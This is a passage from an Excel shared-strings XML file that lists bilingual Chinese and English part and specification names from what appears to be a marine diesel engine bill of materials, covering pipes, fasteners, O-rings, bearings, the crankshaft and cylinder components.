      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承吊装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承滑油连接管布置图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动停止阀支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自由端中间体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自由手柄</t>
    </r>
  </si>
  <si>
    <t>5K blind flange s</t>
  </si>
  <si>
    <t>Gasket 65×65×t1.5</t>
  </si>
  <si>
    <t>变径管</t>
  </si>
  <si>
    <t>Bolt M12 x 25</t>
  </si>
  <si>
    <t>支撑杆</t>
  </si>
  <si>
    <t>轴向减震器单向阀</t>
  </si>
  <si>
    <t>十字槽盘头螺钉</t>
  </si>
  <si>
    <t>泄放支管</t>
  </si>
  <si>
    <t>驱动端燃油减震器泄放管</t>
  </si>
  <si>
    <t>偏心变径管</t>
  </si>
  <si>
    <t>燃油管焊接规范</t>
  </si>
  <si>
    <t>带螺检孔的法兰垫</t>
  </si>
  <si>
    <t>Pipe Support H100×100×6/8×300</t>
  </si>
  <si>
    <t>主滑油驱动端进油支管</t>
  </si>
  <si>
    <t>主轴承滑油（驱动端）</t>
  </si>
  <si>
    <t>主轴承滑油（中间）</t>
  </si>
  <si>
    <t>Inlet branch pipe of piston cooling lube oil</t>
  </si>
  <si>
    <t>活塞冷却油管</t>
  </si>
  <si>
    <t>燃油进口管</t>
  </si>
  <si>
    <t>Pipe Support Assembly L100X100X10-340L</t>
  </si>
  <si>
    <t>Pipe Support Assembly L100X100X10-361.5L</t>
  </si>
  <si>
    <t xml:space="preserve">Bite Tyoe Fittings (For Steel Pipe Use) </t>
  </si>
  <si>
    <t>卡套式管接头</t>
  </si>
  <si>
    <t>支架装配图</t>
  </si>
  <si>
    <t>Bracket Assembly L40x40x5x140</t>
  </si>
  <si>
    <t>Hopper Assembly L40x40x5x110</t>
  </si>
  <si>
    <t>Pipe Support Assembly L40×40×5×176</t>
  </si>
  <si>
    <t>Pipe Support Assembly L40×40×5×214</t>
  </si>
  <si>
    <t>Pipe Support Assembly L40×40×5×88</t>
  </si>
  <si>
    <t>Pipe Support Assembly L40X40X5-148.5L</t>
  </si>
  <si>
    <t>Pipe Support L40x40x5x100</t>
  </si>
  <si>
    <t>Pipe Support L40x40x5x103L</t>
  </si>
  <si>
    <t>Pipe Support L40x40x5x126L</t>
  </si>
  <si>
    <t>Pipe Support L40x40x5x127L</t>
  </si>
  <si>
    <t>起动阀支架</t>
  </si>
  <si>
    <t>凸轮轴滑油管</t>
  </si>
  <si>
    <t>Orifice φ5</t>
  </si>
  <si>
    <t>Pipe 10A×1044.5mm</t>
  </si>
  <si>
    <t>Pipe 10A×1335.7mm</t>
  </si>
  <si>
    <t>Pipe 10A×270.0mm</t>
  </si>
  <si>
    <t>Pipe 10A×458.1mm</t>
  </si>
  <si>
    <t>Pipe 10A×511.6mm</t>
  </si>
  <si>
    <t>Pipe 10A×887.3mm</t>
  </si>
  <si>
    <t>Pipe 10A×Sch40×1247.4mm</t>
  </si>
  <si>
    <t>Pipe 10A×Sch40×2435.5mm</t>
  </si>
  <si>
    <t>Pipe 10A×Sch40×997.3mm</t>
  </si>
  <si>
    <t>Pipe 20A×164.9mm</t>
  </si>
  <si>
    <t>Pipe 20A×240.6mm</t>
  </si>
  <si>
    <t>Pipe 20A×386.0mm</t>
  </si>
  <si>
    <t>Pipe 20A×450.1mm</t>
  </si>
  <si>
    <t>Pipe 20A×452.6mm</t>
  </si>
  <si>
    <t>Pipe 20A×47.4mm</t>
  </si>
  <si>
    <t>Pipe 20A×471.4mm</t>
  </si>
  <si>
    <t>Pipe 20A×61.5mm</t>
  </si>
  <si>
    <t>Pipe 20A×620.9mm</t>
  </si>
  <si>
    <t>Pipe 20A×65.4mm</t>
  </si>
  <si>
    <t>Pipe 20A×96mm</t>
  </si>
  <si>
    <t>Pipe 20A×Sch40×100mm</t>
  </si>
  <si>
    <t>Pipe 20A×Sch40×242mm</t>
  </si>
  <si>
    <t>Pipe 32A×537.5mm</t>
  </si>
  <si>
    <t>Pipe 32A×Sch40×294mm</t>
  </si>
  <si>
    <t>Pipe 32A×Sch40×506mm</t>
  </si>
  <si>
    <t>Pipe 32A×Sch40×787.4mm</t>
  </si>
  <si>
    <t>Pipe 40A×107.7mm</t>
  </si>
  <si>
    <t>Pipe 40A×1075.3mm</t>
  </si>
  <si>
    <t>Pipe 40A×116.6mm</t>
  </si>
  <si>
    <t>Pipe 40A×122.2mm</t>
  </si>
  <si>
    <t>Pipe 40A×42.8mm</t>
  </si>
  <si>
    <t>Pipe 40A×45.9mm</t>
  </si>
  <si>
    <t>Pipe 50A×223.2mm</t>
  </si>
  <si>
    <t>Pipe 50A×23.2mm</t>
  </si>
  <si>
    <t>Pipe 50A×41.7mm</t>
  </si>
  <si>
    <t>Pipe 50A×530mm</t>
  </si>
  <si>
    <t>Pipe 50A×61.7mm</t>
  </si>
  <si>
    <t>Pipe 50A×680.4mm</t>
  </si>
  <si>
    <t>Pipe 50A×918mm</t>
  </si>
  <si>
    <t>Pipe 50A×94.1mm</t>
  </si>
  <si>
    <t>Pipe 50A×Sch40×1753mm</t>
  </si>
  <si>
    <t>Pipe 50A×Sch40×3765mm</t>
  </si>
  <si>
    <t>Pipe 50A×Sch40×520.2mm</t>
  </si>
  <si>
    <t>Pipe 50A×Sch40×79.2mm</t>
  </si>
  <si>
    <t>Pipe 50A×Sch40×92mm</t>
  </si>
  <si>
    <t>Pipe 6A×694mm</t>
  </si>
  <si>
    <t>轴向减震器滑油管</t>
  </si>
  <si>
    <t>管子制造规范</t>
  </si>
  <si>
    <t>Pipe φ6×1×698.5mm</t>
  </si>
  <si>
    <t>Plug M20×1.5</t>
  </si>
  <si>
    <t>变径卡套接头</t>
  </si>
  <si>
    <t>防爆阀帽</t>
  </si>
  <si>
    <t>燃油减震器螺纹接头</t>
  </si>
  <si>
    <t>Screw M4×0.7×10</t>
  </si>
  <si>
    <t>螺纹考克</t>
  </si>
  <si>
    <t>套管支架</t>
  </si>
  <si>
    <t>特制U型螺栓</t>
  </si>
  <si>
    <t>双环法兰</t>
  </si>
  <si>
    <t>弹簧垫片</t>
  </si>
  <si>
    <t>Square Flanges　65×65×ｔ12</t>
  </si>
  <si>
    <t>联管螺母</t>
  </si>
  <si>
    <t>铁丝</t>
  </si>
  <si>
    <t>座板</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rigging conn.pipe of starting air（1/2～2/2）</t>
  </si>
  <si>
    <t>Standard pipe designation (Mechanical lubricating type)</t>
  </si>
  <si>
    <t>Pipe 50A X Sch40 X 5500L</t>
  </si>
  <si>
    <t>Pipe 32A X Sch40 X 5500L</t>
  </si>
  <si>
    <t>Pipe 15A X Sch40 X 5500L</t>
  </si>
  <si>
    <t>Pipe 10A X Sch40 X 5500L</t>
  </si>
  <si>
    <t>Pipe 40A X Sch40 X 5500L</t>
  </si>
  <si>
    <t>Pipe φ17 X φ5 X 5500L</t>
  </si>
  <si>
    <t>Pipe φ15 X φ4 X 5500L</t>
  </si>
  <si>
    <t>Pipe 20A X Sch80 X 5500L</t>
  </si>
  <si>
    <t>Pipe φ6 X t1.0 X 4000L</t>
  </si>
  <si>
    <t>Pipe φ10 X t1.5 X 4000L</t>
  </si>
  <si>
    <t>Pipe 20A X Sch40 X 5500L</t>
  </si>
  <si>
    <t>Material specification of steel plates</t>
  </si>
  <si>
    <t>Steel plate 40x1210x4760</t>
  </si>
  <si>
    <t>Steel plate 40x1950x5870</t>
  </si>
  <si>
    <t>Steel plate 40x1000x3265</t>
  </si>
  <si>
    <t>Steel plate 28x2080x5290</t>
  </si>
  <si>
    <t>Steel plate 20x1000x3000</t>
  </si>
  <si>
    <t>Steel plate 16x2445x5570</t>
  </si>
  <si>
    <t>Steel plate 12x1280x3000</t>
  </si>
  <si>
    <t>Steel plate 9x1000x3000</t>
  </si>
  <si>
    <t>Steel plate 7x2070x4710</t>
  </si>
  <si>
    <t>Steel plate 60x2270x4290</t>
  </si>
  <si>
    <t>Steel plate 25x1000x3000</t>
  </si>
  <si>
    <t>Steel plate 32x1000x3000</t>
  </si>
  <si>
    <t>Steel plate 30x1430x4720</t>
  </si>
  <si>
    <t>Steel plate 25x1920x4530</t>
  </si>
  <si>
    <t>Steel plate 25x2210x6190</t>
  </si>
  <si>
    <t>Vertical oil drain assembly drawing</t>
  </si>
  <si>
    <t>Flat bar 40×4×L</t>
  </si>
  <si>
    <t>Flat bar 40×4×I</t>
  </si>
  <si>
    <t>Hexagon head bolt M16 X 30</t>
  </si>
  <si>
    <t>Screw M6 X 8</t>
  </si>
  <si>
    <t>Specifications / instructions for main bearing (aluminium bearing)</t>
  </si>
  <si>
    <t>Material and testing specification</t>
  </si>
  <si>
    <t>Testing specification for chemical analysis of materials</t>
  </si>
  <si>
    <t>Non-destructive testing (NDT) specification</t>
  </si>
  <si>
    <t>First time production approval (FTPA)</t>
  </si>
  <si>
    <t>Material and testing specification for first time production approval: bearings</t>
  </si>
  <si>
    <t>Welding and quality instruction</t>
  </si>
  <si>
    <t>Instruction for PWHT</t>
  </si>
  <si>
    <t>Specification for corrosion protective products</t>
  </si>
  <si>
    <t>Specification for coating and corrosion protection</t>
  </si>
  <si>
    <t>Material-and test specification</t>
  </si>
  <si>
    <t>Normalizing of carbon steels and cast Iron</t>
  </si>
  <si>
    <t>Quality-and test specification</t>
  </si>
  <si>
    <t>Evaluation of mechanical properties (Tensile test and impact test)</t>
  </si>
  <si>
    <t>Chemical analysis of materials</t>
  </si>
  <si>
    <t>Main bearing cover material order</t>
  </si>
  <si>
    <t>Specifications/instructions for Main bearing (bearing cover)</t>
  </si>
  <si>
    <t>Material- and test specification: bearing cover main bearing</t>
  </si>
  <si>
    <t>Testing specification non destructive testing</t>
  </si>
  <si>
    <t>Specifications/Instructions for elastic bolt</t>
  </si>
  <si>
    <t>Heat treatment specification of low-alloy steels</t>
  </si>
  <si>
    <t>Hardness testing</t>
  </si>
  <si>
    <t>Testing specification for non destructive testing</t>
  </si>
  <si>
    <t>Round nut M30</t>
  </si>
  <si>
    <t>Spring dowel pin 8 X 20</t>
  </si>
  <si>
    <t>Spring dowel pin 12 X 30</t>
  </si>
  <si>
    <t>Hexagon head screw M12 X 25</t>
  </si>
  <si>
    <t>Screw plug G 3/4</t>
  </si>
  <si>
    <t>Round nut M36</t>
  </si>
  <si>
    <t>Elastic bolt M36</t>
  </si>
  <si>
    <t>Spherical round nut M36</t>
  </si>
  <si>
    <t>Hexagon nut M4</t>
  </si>
  <si>
    <t>Hexagon socket head cap screw M6 X 8</t>
  </si>
  <si>
    <t>Hexagon socket head cap screw M6 X 25</t>
  </si>
  <si>
    <t>Hexagon nut M6</t>
  </si>
  <si>
    <t>Casing upper part welding drawing</t>
  </si>
  <si>
    <t>Casing lower part welding drawing</t>
  </si>
  <si>
    <t>Hexagon head screw M12 X 20</t>
  </si>
  <si>
    <t>Hexagon head screw M12 X 30</t>
  </si>
  <si>
    <t>Hexagon head socket M12 X 20</t>
  </si>
  <si>
    <t>Hexagon head socket M12 X 25</t>
  </si>
  <si>
    <t>Taper pin 6 X20</t>
  </si>
  <si>
    <t>Taper pin 20 X 45</t>
  </si>
  <si>
    <t>Arrangement of column doors and relief valve (Mt.H)</t>
  </si>
  <si>
    <t xml:space="preserve">Chain </t>
  </si>
  <si>
    <t>Flat bar 13 X 2 X 831</t>
  </si>
  <si>
    <t>Relief valve column different manufacturer (Mt.H)</t>
  </si>
  <si>
    <t>Relief valve type M20-266</t>
  </si>
  <si>
    <t>Hexagon head bolt M12 X 120</t>
  </si>
  <si>
    <t>Scavenging air receiver machining</t>
  </si>
  <si>
    <t>Plate t25</t>
  </si>
  <si>
    <t>Plate t16</t>
  </si>
  <si>
    <t>Plate t9</t>
  </si>
  <si>
    <t>Plate 16</t>
  </si>
  <si>
    <t>Flange t20</t>
  </si>
  <si>
    <t>Pipe φ76.3 X 4.2 X 70</t>
  </si>
  <si>
    <t>Plate t2</t>
  </si>
  <si>
    <t>Lug t16</t>
  </si>
  <si>
    <t>Plate t30</t>
  </si>
  <si>
    <t>Hinge t16</t>
  </si>
  <si>
    <t>Pad 16 X 50 X 35</t>
  </si>
  <si>
    <t>Pipe φ216.3 X 5.8 X 143</t>
  </si>
  <si>
    <t>Pipe φ34 X 3.2 X 102</t>
  </si>
  <si>
    <t>Pipe φ76.3 X 4.2</t>
  </si>
  <si>
    <t>Instruction for surface protection air channel SAC/water separator</t>
  </si>
  <si>
    <t>Hand grip 130 X 50</t>
  </si>
  <si>
    <t>Plate t6</t>
  </si>
  <si>
    <t xml:space="preserve">Flap </t>
  </si>
  <si>
    <t>Stopper t1.5</t>
  </si>
  <si>
    <t>Support t6</t>
  </si>
  <si>
    <t>Axle 18 X 737</t>
  </si>
  <si>
    <t>Floor plate t4.5</t>
  </si>
  <si>
    <t>Sleeve 30 X 60</t>
  </si>
  <si>
    <t>Sleeve 35 X 60</t>
  </si>
  <si>
    <t>Hexagon head screw M6 X 25</t>
  </si>
  <si>
    <t>Hexagon head screw M8 X 16</t>
  </si>
  <si>
    <t>Hexagon head bolt M10 X 60</t>
  </si>
  <si>
    <t>Hexagon head bolt M10 X 70</t>
  </si>
  <si>
    <t>Hexagon head screw M16 X 30</t>
  </si>
  <si>
    <t>Hexagon head screw M16 X 35</t>
  </si>
  <si>
    <t>Hexagon head screw M16 X 40</t>
  </si>
  <si>
    <t>Hexagon head screw M16 X 45</t>
  </si>
  <si>
    <t>Hexagon head screw M16 X 50</t>
  </si>
  <si>
    <t>Hexagon head bolt M16 X 110</t>
  </si>
  <si>
    <t>Hexagon head bolt M16 X 200</t>
  </si>
  <si>
    <t>Hexagon head bolt M20 X 120</t>
  </si>
  <si>
    <t>Tension washer 16</t>
  </si>
  <si>
    <t>Pin 18 X 75</t>
  </si>
  <si>
    <t>Seal t3</t>
  </si>
  <si>
    <t>Flange t16</t>
  </si>
  <si>
    <t>Sealing ring 122 X 100 X 2</t>
  </si>
  <si>
    <t>Plate t15</t>
  </si>
  <si>
    <t>Plate t12</t>
  </si>
  <si>
    <t>Flange plate t12</t>
  </si>
  <si>
    <t>Plate t10</t>
  </si>
  <si>
    <t>Gasket t3</t>
  </si>
  <si>
    <t>Cover t12</t>
  </si>
  <si>
    <t>Cover plate t24</t>
  </si>
  <si>
    <t>Cover t10</t>
  </si>
  <si>
    <t>Blind flange 5K - 65A</t>
  </si>
  <si>
    <t>Hexagon head screw M12 X 40</t>
  </si>
  <si>
    <t>Gasket 5K - 10</t>
  </si>
  <si>
    <t>Hand grip 130x35</t>
  </si>
  <si>
    <t>Round nut M33</t>
  </si>
  <si>
    <t>Spring pin 12x36</t>
  </si>
  <si>
    <t>Taper pin 16x45</t>
  </si>
  <si>
    <t>Stud M16x55</t>
  </si>
  <si>
    <t>Hexagon head bolt M20x85</t>
  </si>
  <si>
    <t>Instructions for tightning elastic stud</t>
  </si>
  <si>
    <t>Material and test specification : Elastic bolt</t>
  </si>
  <si>
    <t>Quench and temper of low-alloy steels</t>
  </si>
  <si>
    <t>Testing specification hardness testing</t>
  </si>
  <si>
    <t>Quality and test  specification bolts and studs</t>
  </si>
  <si>
    <t>Tie rod assembly</t>
  </si>
  <si>
    <t>Tie rod (material order)</t>
  </si>
  <si>
    <t>Specifications / instructions for tie rod</t>
  </si>
  <si>
    <t>Material and testing specification: Tie rod</t>
  </si>
  <si>
    <t>Plate 3 thickness</t>
  </si>
  <si>
    <t>Round nut M36x3</t>
  </si>
  <si>
    <t>Hexagon head screw M12x25</t>
  </si>
  <si>
    <t>Cylinder liner material order</t>
  </si>
  <si>
    <t>Hexagon head screw M10x50</t>
  </si>
  <si>
    <t>10.9-Bolts</t>
  </si>
  <si>
    <t>Washer for upper insul. bandage cylinder liner</t>
  </si>
  <si>
    <t>Specifications/Instructions for cylinder liner</t>
  </si>
  <si>
    <t>First time production approval cylinder liner machining</t>
  </si>
  <si>
    <t>First time production apploval (FTPA)</t>
  </si>
  <si>
    <t>Material and quality specification cylinder liner FTPA</t>
  </si>
  <si>
    <t>Specifications/Instructions for water guide jacket</t>
  </si>
  <si>
    <t>Cone washer t0.5</t>
  </si>
  <si>
    <t>Cone washer t1.0</t>
  </si>
  <si>
    <t>Cone washer t02.0</t>
  </si>
  <si>
    <t>Copper gasket 9.5x14xt0.5</t>
  </si>
  <si>
    <t>Socket head screw M10x70</t>
  </si>
  <si>
    <t>Performance inspection manual</t>
  </si>
  <si>
    <t>Marking instruction Cylinder liner lubricating oil stud</t>
  </si>
  <si>
    <t>CYLINDER COVER ASSEMBLY (SFVA F12)</t>
  </si>
  <si>
    <t>CYLINDER COVER (SFVA F12)</t>
  </si>
  <si>
    <t>Cylinder cover material order (SFVA F12)</t>
  </si>
  <si>
    <t>Spring box assembly for tighing fuel valve</t>
  </si>
  <si>
    <t>Slotted set screw M5 X 0.8 X 10</t>
  </si>
  <si>
    <t>Parallel pin 10 X 70</t>
  </si>
  <si>
    <t>Washer faced bolt M16</t>
  </si>
  <si>
    <t>Hexagon nut M14</t>
  </si>
  <si>
    <t>Specifications/instructions for cylinder cover (16CrMo4-4)</t>
  </si>
  <si>
    <t>Material and testing specification: Forged cylinder covers</t>
  </si>
  <si>
    <t>Material - spec. for O-Rings</t>
  </si>
  <si>
    <t>Quality / Test spec. / Press. Parts</t>
  </si>
  <si>
    <t>Material and test specifications for elastic bolt</t>
  </si>
  <si>
    <t>Quality and test specification bolts and studs</t>
  </si>
  <si>
    <t>Material - and testing specification</t>
  </si>
  <si>
    <t>Material and testing specification: Elastic bolt</t>
  </si>
  <si>
    <t>Instruction to tighten elastic bolts</t>
  </si>
  <si>
    <t>Gland box piston rod assembly</t>
  </si>
  <si>
    <t>Material specification for crankshaft</t>
  </si>
  <si>
    <t>Material and quality specification semi built forged crankshafts</t>
  </si>
  <si>
    <t>FTPT:Material specification forged crank throws</t>
  </si>
  <si>
    <t>Instr. of testing device</t>
  </si>
  <si>
    <t>Crankshaft accessories arrengement</t>
  </si>
  <si>
    <t>Specifications/Instructions for flywheel</t>
  </si>
  <si>
    <t>Material specification for polytetrafluorethylene</t>
  </si>
  <si>
    <t>Cylinder half material order</t>
  </si>
  <si>
    <t>PTFE Gasket 2-parts</t>
  </si>
  <si>
    <t>Hexagon head bolt M20×145</t>
  </si>
  <si>
    <t>Piston head material order</t>
  </si>
  <si>
    <t>11T Bolts</t>
  </si>
  <si>
    <t>Socket head cap screw</t>
  </si>
  <si>
    <t>Specifiation for piston rod</t>
  </si>
  <si>
    <t>Material and test specification: Piston rod</t>
  </si>
  <si>
    <t>Piston cooling/Crosshead lub</t>
  </si>
  <si>
    <t>Screw plug  M30×2</t>
  </si>
  <si>
    <t>Hexagon head screw  M8×35</t>
  </si>
  <si>
    <t>Hexagon head bolt  M8×35</t>
  </si>
  <si>
    <t>Hexagon head screw  M8×45</t>
  </si>
  <si>
    <t>Crosshead pin_x000D_</t>
  </si>
  <si>
    <t>Elastic bolt_x000D_</t>
  </si>
  <si>
    <t>Dowel pin_x000D_</t>
  </si>
  <si>
    <t>Guide shoe for clckwise rotating</t>
  </si>
  <si>
    <t>Specifications/instructions for cast steel components</t>
  </si>
  <si>
    <t>Guide rail_x000D_</t>
  </si>
  <si>
    <t>White metal spec</t>
  </si>
  <si>
    <t>Material and test specification : cast steel components</t>
  </si>
  <si>
    <t>Specifications/Instructions for white metal lining</t>
  </si>
  <si>
    <t>Material and test specification : white metal lining</t>
  </si>
  <si>
    <t>Specifications/instructions for crosshead pin</t>
  </si>
  <si>
    <t>Instruction for surface examination of pin</t>
  </si>
  <si>
    <t>Preserving instruction for crosshead pin</t>
  </si>
  <si>
    <t>Material and test specification : Crosshead pin</t>
  </si>
  <si>
    <t>Auxiliary blower (No.1)</t>
  </si>
  <si>
    <t>Auxiliary blower (No.2)</t>
  </si>
  <si>
    <t>Manucfacturing and quality instruction for piping system</t>
  </si>
  <si>
    <t>Housing (Oil cylinder)</t>
  </si>
  <si>
    <t>Thrust piece (upper)</t>
  </si>
  <si>
    <t>Roller pin assembly</t>
  </si>
  <si>
    <t>Check valve (LC16)</t>
  </si>
  <si>
    <t>Cover (LFA16)</t>
  </si>
  <si>
    <t>Plug M20 X 1.5</t>
  </si>
  <si>
    <t>Slotted set screw M8 X 16</t>
  </si>
  <si>
    <t>Copper gasket 22 X 28 X t1</t>
  </si>
  <si>
    <t>Plug G1/4</t>
  </si>
  <si>
    <t>Retaining ring 60</t>
  </si>
  <si>
    <t>Copper gasket 12.5 X 16 X t0.5</t>
  </si>
  <si>
    <t>Socket head cap screw M8 X 45</t>
  </si>
  <si>
    <t>Rim for crankshaft gear</t>
  </si>
  <si>
    <t>Rough machining drawing for crankshaft gear rim</t>
  </si>
  <si>
    <t>Rim for camshaft gear</t>
  </si>
  <si>
    <t>Rough machining drawing for camshaft gear rim</t>
  </si>
  <si>
    <t>Hub for chamshaft gear</t>
  </si>
  <si>
    <t>Hexagon nut M24</t>
  </si>
  <si>
    <t>Rim for idle gear</t>
  </si>
  <si>
    <t>Rough machining drawing for idle gear</t>
  </si>
  <si>
    <t>Bush (Free end)</t>
  </si>
  <si>
    <t xml:space="preserve">Whight metal </t>
  </si>
  <si>
    <t>Before casting drawing</t>
  </si>
  <si>
    <t>Bush (Driving end)</t>
  </si>
  <si>
    <t>Idle gear shaft (Middle machining)</t>
  </si>
  <si>
    <t>Idle gear shaft support</t>
  </si>
  <si>
    <t>Lubrication pipe</t>
  </si>
  <si>
    <t>Flange t12</t>
  </si>
  <si>
    <t>Plate t4.5</t>
  </si>
  <si>
    <t>Pipe 6A X 250</t>
  </si>
  <si>
    <t>Pipe 6A X 45</t>
  </si>
  <si>
    <t>Pipe 6A X 220</t>
  </si>
  <si>
    <t>Pipe 6A X 480</t>
  </si>
  <si>
    <t>Full-face gasket 5K - 10A</t>
  </si>
  <si>
    <t>Gear casing</t>
  </si>
  <si>
    <t>Plate t45</t>
  </si>
  <si>
    <t>Plate t55</t>
  </si>
  <si>
    <t>Flange t55</t>
  </si>
  <si>
    <t>Welding drawing for plate</t>
  </si>
  <si>
    <t>Plate t8</t>
  </si>
  <si>
    <t>Grip φ12</t>
  </si>
  <si>
    <t>Hexagon head bolt with wire hole M10 X 25</t>
  </si>
  <si>
    <t>Bolt with wire hole M30 X 90</t>
  </si>
  <si>
    <t>Locking plate -A M16</t>
  </si>
  <si>
    <t>Pipe support B - type φ10 X 1</t>
  </si>
  <si>
    <t>Bolt M16 X 30</t>
  </si>
  <si>
    <t>Bolt M20 X 50</t>
  </si>
  <si>
    <t>Socket head cap screw M4 X 12</t>
  </si>
  <si>
    <t>Double tongued washer M4 X 0.7</t>
  </si>
  <si>
    <t>Thread end taper pin (A)</t>
  </si>
  <si>
    <t>Hydraulic pressure cylinder</t>
  </si>
  <si>
    <t>Orifice assembly</t>
  </si>
  <si>
    <t>Stopper plate</t>
  </si>
  <si>
    <t>Bolt M10 X 30</t>
  </si>
  <si>
    <t>Conical spring washer M10</t>
  </si>
  <si>
    <t>Valve stem for starting air valve</t>
  </si>
  <si>
    <t>O-ring P28</t>
  </si>
  <si>
    <t>O-ring P50</t>
  </si>
  <si>
    <t>O-ring G55</t>
  </si>
  <si>
    <t>O-ring G60</t>
  </si>
  <si>
    <t>Slotted set screw M4 X 0.7 X 5</t>
  </si>
  <si>
    <t>Grease nipple R1/8</t>
  </si>
  <si>
    <t>Headless set screw M6 X 8</t>
  </si>
  <si>
    <t>Adjust bolt</t>
  </si>
  <si>
    <t>Fuel pipe connecting branch</t>
  </si>
  <si>
    <t>Air vent valve</t>
  </si>
  <si>
    <t>Spring retainer (lower)</t>
  </si>
  <si>
    <t>Spindle guide (upper)</t>
  </si>
  <si>
    <t>Nozzle tip for fuel valve</t>
  </si>
  <si>
    <t>Nozzle tip body</t>
  </si>
  <si>
    <t>Nozzle hole part</t>
  </si>
  <si>
    <t>Spindle guide (lower)</t>
  </si>
  <si>
    <t>Nut M33 X 2</t>
  </si>
  <si>
    <t>O-ring P10A</t>
  </si>
  <si>
    <t>O-ring G45</t>
  </si>
  <si>
    <t>Coating</t>
  </si>
  <si>
    <t>Stem guide</t>
  </si>
  <si>
    <t>Cotter assembly</t>
  </si>
  <si>
    <t>Air spring piston</t>
  </si>
  <si>
    <t>Air spring cylinder</t>
  </si>
  <si>
    <t>Cap seal</t>
  </si>
  <si>
    <t>O-ring P32</t>
  </si>
  <si>
    <t>O-ring G160</t>
  </si>
  <si>
    <t>Hexagon nut M20</t>
  </si>
  <si>
    <t>Bolt with wire hole M10 X 35</t>
  </si>
  <si>
    <t>Parallel pin 8 X 16</t>
  </si>
  <si>
    <t>Conical spring washer M8</t>
  </si>
  <si>
    <t>Bolt M8 X 30</t>
  </si>
  <si>
    <t>10.9 - Bolt M8 X 55</t>
  </si>
  <si>
    <t>Socket head cap screw M12 X 30</t>
  </si>
  <si>
    <t>Locking wire 1.6 X 500L</t>
  </si>
  <si>
    <t>Spring washer M20</t>
  </si>
  <si>
    <t>Lagging procedure</t>
  </si>
  <si>
    <t>Specifications/instructions for valve cage</t>
  </si>
  <si>
    <t>Material - and test specification: Valve cage</t>
  </si>
  <si>
    <t>Specifications/instructions for steel valve stem</t>
  </si>
  <si>
    <t>Quality and specification</t>
  </si>
  <si>
    <t>FTPA : Material specification</t>
  </si>
  <si>
    <t>Stellite overlaving and examination</t>
  </si>
  <si>
    <t>Specifications/Instructions for valve seat</t>
  </si>
  <si>
    <t>Material- and test specification valve seat</t>
  </si>
  <si>
    <t xml:space="preserve">Gasket </t>
  </si>
  <si>
    <t>Hexagon socket head cap screw M20 X 70</t>
  </si>
  <si>
    <t>Plunger barrel</t>
  </si>
  <si>
    <t>Headless set screw M3 X 0.5 X 4</t>
  </si>
  <si>
    <t>Delivery valve (seat)</t>
  </si>
  <si>
    <t>Delivery valve (valve)</t>
  </si>
  <si>
    <t>Upper spring seat</t>
  </si>
  <si>
    <t>Delivery valve spring seat</t>
  </si>
  <si>
    <t>Lower spring seat</t>
  </si>
  <si>
    <t>Barrel set bolt gasket</t>
  </si>
  <si>
    <t>Hexagon socket head cap screw M8 X 30</t>
  </si>
  <si>
    <t>Retaining ring C-type for hole φ38</t>
  </si>
  <si>
    <t>Lock wire φ1.0</t>
  </si>
  <si>
    <t>Eyenut assembly</t>
  </si>
  <si>
    <t>Eyebolt M20</t>
  </si>
  <si>
    <t>O-ring P80</t>
  </si>
  <si>
    <t>O-ring P85</t>
  </si>
  <si>
    <t>O-ring P100</t>
  </si>
  <si>
    <t>O-ring G35</t>
  </si>
  <si>
    <t>O-ring G40</t>
  </si>
  <si>
    <t>Back-up ring 85</t>
  </si>
  <si>
    <t>Bolt M20 X 100</t>
  </si>
  <si>
    <t>Pan head screw M6 X 20</t>
  </si>
  <si>
    <t>Fuel oil injection pump driving gear assembly</t>
  </si>
  <si>
    <t xml:space="preserve">Roller pin </t>
  </si>
  <si>
    <t>Slotted set screw M8 x 10</t>
  </si>
  <si>
    <t>Adjust screw</t>
  </si>
  <si>
    <t>Orifice joint</t>
  </si>
  <si>
    <t>O-ring P60</t>
  </si>
  <si>
    <t>Slotted set screw M10 x 14</t>
  </si>
  <si>
    <t>Copper gasket 22x28xt1</t>
  </si>
  <si>
    <t>Bolt M10 x 20</t>
  </si>
  <si>
    <t>Grip φ9</t>
  </si>
  <si>
    <t>O-ring P24</t>
  </si>
  <si>
    <t>Washer faced bolt M24</t>
  </si>
  <si>
    <t>Hexagon head bolt with wire hole M16 X 45</t>
  </si>
  <si>
    <t>Hexagon head bolt with wire hole M16 X 70</t>
  </si>
  <si>
    <t>U-nut M24 X 2</t>
  </si>
  <si>
    <t>Bolt M16 X 35</t>
  </si>
  <si>
    <t>Bolt M16 X 45</t>
  </si>
  <si>
